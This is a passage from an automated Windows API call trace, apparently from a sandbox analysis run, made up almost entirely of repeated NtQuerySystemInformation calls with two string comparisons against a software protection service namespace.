(SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.457] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.457] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.457] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.457] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.457] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd240, Length=0x50, ResultLength=0x0) [0227.457] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.457] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd240, Length=0x50, ResultLength=0x0) [0227.458] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.458] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd240, Length=0x50, ResultLength=0x0) [0227.458] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd130, Length=0x50, ResultLength=0x0) [0227.458] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.458] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd130, Length=0x50, ResultLength=0x0) [0227.458] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.458] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd130, Length=0x50, ResultLength=0x0) [0227.458] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.458] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd130, Length=0x50, ResultLength=0x0) [0227.458] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.458] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd060, Length=0x38, ResultLength=0x0) [0227.479] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.479] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce90, Length=0x28, ResultLength=0x0) [0227.479] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.479] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.479] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce90, Length=0x28, ResultLength=0x0) [0227.479] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.479] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.479] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce90, Length=0x28, ResultLength=0x0) [0227.479] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf00, Length=0x28, ResultLength=0x0) [0227.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd060, Length=0x38, ResultLength=0x0) [0227.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf80, Length=0x28, ResultLength=0x0) [0227.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf80, Length=0x28, ResultLength=0x0) [0227.483] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.483] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.483] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd060, Length=0x38, ResultLength=0x0) [0227.483] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcee0, Length=0x20, ResultLength=0x0) [0227.483] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce60, Length=0x20, ResultLength=0x0) [0227.483] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.483] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce60, Length=0x20, ResultLength=0x0) [0227.483] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.483] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce60, Length=0x20, ResultLength=0x0) [0227.483] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.483] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.483] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.483] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.483] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd060, Length=0x38, ResultLength=0x0) [0227.484] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcee0, Length=0x20, ResultLength=0x0) [0227.484] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce70, Length=0x20, ResultLength=0x0) [0227.484] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.484] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.484] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.484] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce70, Length=0x20, ResultLength=0x0) [0227.484] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.484] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.484] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.484] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.484] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.484] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.485] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.485] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2f0, Length=0x50, ResultLength=0x0) [0227.485] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd270, Length=0x28, ResultLength=0x0) [0227.485] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0227.485] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.485] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.485] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2f0, Length=0x50, ResultLength=0x0) [0227.485] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.485] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2f0, Length=0x50, ResultLength=0x0) [0227.485] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.485] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2f0, Length=0x50, ResultLength=0x0) [0227.485] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd220, Length=0x38, ResultLength=0x0) [0227.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd050, Length=0x28, ResultLength=0x0) [0227.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd050, Length=0x28, ResultLength=0x0) [0227.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd050, Length=0x28, ResultLength=0x0) [0227.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0c0, Length=0x28, ResultLength=0x0) [0227.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd220, Length=0x38, ResultLength=0x0) [0227.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd140, Length=0x28, ResultLength=0x0) [0227.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd140, Length=0x28, ResultLength=0x0) [0227.494] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.494] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.494] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd220, Length=0x38, ResultLength=0x0) [0227.494] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0a0, Length=0x20, ResultLength=0x0) [0227.494] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd020, Length=0x20, ResultLength=0x0) [0227.494] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.494] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd020, Length=0x20, ResultLength=0x0) [0227.494] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.494] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd020, Length=0x20, ResultLength=0x0) [0227.494] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.494] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.494] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.494] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.494] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd220, Length=0x38, ResultLength=0x0) [0227.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0a0, Length=0x20, ResultLength=0x0) [0227.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd030, Length=0x20, ResultLength=0x0) [0227.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd030, Length=0x20, ResultLength=0x0) [0227.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2f0, Length=0x50, ResultLength=0x0) [0227.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd270, Length=0x28, ResultLength=0x0) [0227.496] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0227.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2f0, Length=0x50, ResultLength=0x0) [0227.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2f0, Length=0x50, ResultLength=0x0) [0227.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2f0, Length=0x50, ResultLength=0x0) [0227.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd220, Length=0x38, ResultLength=0x0) [0227.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd050, Length=0x28, ResultLength=0x0) [0227.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd050, Length=0x28, ResultLength=0x0) [0227.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd050, Length=0x28, ResultLength=0x0) [0227.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0c0, Length=0x28, ResultLength=0x0) [0227.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd220, Length=0x38, ResultLength=0x0) [0227.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd140, Length=0x28, ResultLength=0x0) [0227.503] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.503] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.503] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.503] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.503] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.504] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.504] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd140, Length=0x28, ResultLength=0x0) [0227.504] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.504] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.504] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd220, Length=0x38, ResultLength=0x0) [0227.504] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0a0, Length=0x20, ResultLength=0x0) [0227.504] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd020, Length=0x20, ResultLength=0x0) [0227.504] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.504] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd020, Length=0x20, ResultLength=0x0) [0227.504] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.504] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd020, Length=0x20, ResultLength=0x0) [0227.504] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.504] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd220, Length=0x38, ResultLength=0x0) [0227.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0a0, Length=0x20, ResultLength=0x0) [0227.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd030, Length=0x20, ResultLength=0x0) [0227.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd030, Length=0x20, ResultLength=0x0) [0227.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd790, Length=0x50, ResultLength=0x0) [0227.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd790, Length=0x50, ResultLength=0x0) [0227.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd790, Length=0x50, ResultLength=0x0) [0227.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd680, Length=0x50, ResultLength=0x0) [0227.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd680, Length=0x50, ResultLength=0x0) [0227.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd680, Length=0x50, ResultLength=0x0) [0227.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd680, Length=0x50, ResultLength=0x0) [0227.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd5b0, Length=0x38, ResultLength=0x0) [0227.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3e0, Length=0x28, ResultLength=0x0) [0227.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3e0, Length=0x28, ResultLength=0x0) [0227.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3e0, Length=0x28, ResultLength=0x0) [0227.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3e0, Length=0x28, ResultLength=0x0) [0227.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd450, Length=0x28, ResultLength=0x0) [0227.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd5b0, Length=0x38, ResultLength=0x0) [0227.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4d0, Length=0x28, ResultLength=0x0) [0227.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4d0, Length=0x28, ResultLength=0x0) [0227.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd370, Length=0x20, ResultLength=0x0) [0227.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2f0, Length=0x20, ResultLength=0x0) [0227.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2f0, Length=0x20, ResultLength=0x0) [0227.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2f0, Length=0x20, ResultLength=0x0) [0227.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd5b0, 